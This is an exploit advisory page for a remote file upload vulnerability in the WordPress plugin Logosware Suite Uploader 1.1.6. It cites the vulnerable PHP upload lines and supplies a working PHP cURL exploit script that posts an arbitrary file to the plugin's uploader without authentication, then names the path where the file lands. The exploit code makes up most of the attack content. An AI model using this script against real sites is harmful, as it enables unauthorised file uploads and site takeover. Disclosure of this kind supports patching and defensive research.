WordPress Logosware Suite Uploader 1.1.6 File Upload

Published
Credit
Risk
2017.08.01
Anonymous
High
CWE
CVE
Local
Remote
CWE-264
N/A
No
Yes

[-] Title : WordPress Plugin Logosware Suite Uploader 1.1.6 - Remote File Upload
[-] Author : Shahab Shamsi
[-] Vendor : https://wordpress.org/plugins/logosware-suite-uploader/
[-] Category : Webapps
[-] Date : 30.July.2017


Vulnerable Source:
176: if(is_uploaded_file($_FILES['zip']['tmp_name']))
207: move_uploaded_file move_uploaded_file($_FILES['zip']['tmp_name'], $tempZipPath))
206: $tempZipPath = $temporaryPath . $tempZipName;
190: $temporaryPath = $this->tempDir . $temporaryDir . "/";
189: $temporaryDir = date("YmdHis");
204: $tempZipName = "zipfile" . date("His") . ".zip";



Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/lw-suite-uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>


Location File:
http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/file.jpg


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com